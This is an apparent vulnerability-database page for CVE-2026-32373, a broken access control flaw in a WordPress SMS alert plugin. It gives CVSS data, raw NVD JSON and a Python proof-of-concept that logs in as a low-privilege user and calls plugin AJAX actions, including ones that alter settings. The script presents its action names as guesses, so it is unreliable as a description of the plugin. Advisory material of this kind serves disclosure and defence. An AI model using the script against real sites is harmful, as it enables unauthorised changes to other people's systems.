Security Vulnerability Report
中文
CVE-2026-32373 CVSS 5.4 MEDIUM

CVE-2026-32373

Published: 2026-03-13 19:54:52
Last Modified: 2026-04-22 21:30:26

Description

Missing Authorization vulnerability in Cozy Vision SMS Alert Order Notifications sms-alert allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects SMS Alert Order Notifications: from n/a through <= 3.9.0.

CVSS Details

CVSS Score
5.4
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:L

Configurations (Affected Products)

No configuration data available.

SMS Alert Order Notifications (sms-alert) <= 3.9.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2026-32373 PoC - Missing Authorization in SMS Alert Plugin # This PoC demonstrates the broken access control vulnerability # Requires a low-privilege WordPress account (subscriber/contributor role) import requests import json TARGET_URL = "http://target-wordpress-site.com" USERNAME = "low_privilege_user" PASSWORD = "user_password" def get_auth_cookies(): """Login to WordPress and obtain authentication cookies""" login_url = f"{TARGET_URL}/wp-login.php" session = requests.Session() login_data = { 'log': USERNAME, 'pwd': PASSWORD, 'wp-submit': 'Log In', 'redirect_to': '/wp-admin/', 'testcookie': '1' } response = session.post(login_url, data=login_data) return session.cookies.get_dict() def exploit_sms_alert_vulnerability(cookies): """ Exploit the missing authorization vulnerability This attempts to access admin-only SMS alert functions """ # Target the SMS Alert AJAX endpoint ajax_url = f"{TARGET_URL}/wp-admin/admin-ajax.php" # Common vulnerable actions in SMS Alert plugin vulnerable_actions = [ 'sas_fetch_orders', 'sas_send_test_sms', 'sas_save_settings', 'sas_manage_subscribers', 'smsalert_to_get_order_status', 'smsalert_ajax' ] results = [] for action in vulnerable_actions: payload = { 'action': action, 'data': json.dumps({ 'phone': '1234567890', 'message': 'Test exploit message' }) } response = requests.post( ajax_url, data=payload, cookies=cookies ) results.append({ 'action': action, 'status_code': response.status_code, 'response': response.text[:200] }) return results def check_vulnerability(): """Main exploit function""" print("[*] CVE-2026-32373 Exploitation Test") print("[*] Target: SMS Alert Order Notifications Plugin") # Step 1: Authenticate as low-privilege user print("\n[1] Authenticating as low-privilege user...") cookies = get_auth_cookies() if not cookies or 'wordpress_logged_in' not in cookies: print("[-] Authentication failed") return False print("[+] Authentication successful") # Step 2: Test vulnerable endpoints print("\n[2] Testing vulnerable endpoints...") results = exploit_sms_alert_vulnerability(cookies) for result in results: if result['status_code'] == 200 and 'error' not in result['response'].lower(): print(f"[+] VULNERABLE: {result['action']}") print(f" Response: {result['response']}") return True if __name__ == "__main__": check_vulnerability()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-32373", "sourceIdentifier": "[email protected]", "published": "2026-03-13T19:54:51.810", "lastModified": "2026-04-22T21:30:26.497", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Missing Authorization vulnerability in Cozy Vision SMS Alert Order Notifications sms-alert allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects SMS Alert Order Notifications: from n/a through <= 3.9.0."}, {"lang": "es", "value": "Vulnerabilidad de autorización faltante en Cozy Vision SMS Alert Order Notifications sms-alert permite la explotación de niveles de seguridad de control de acceso configurados incorrectamente. Este problema afecta a SMS Alert Order Notifications: desde n/a hasta &lt;= 3.9.0."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:L", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 2.5}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/sms-alert/vulnerability/wordpress-sms-alert-order-notifications-plugin-3-9-0-broken-access-control-vulnerability?_s_id=cve", "source": "[email protected]"}]}}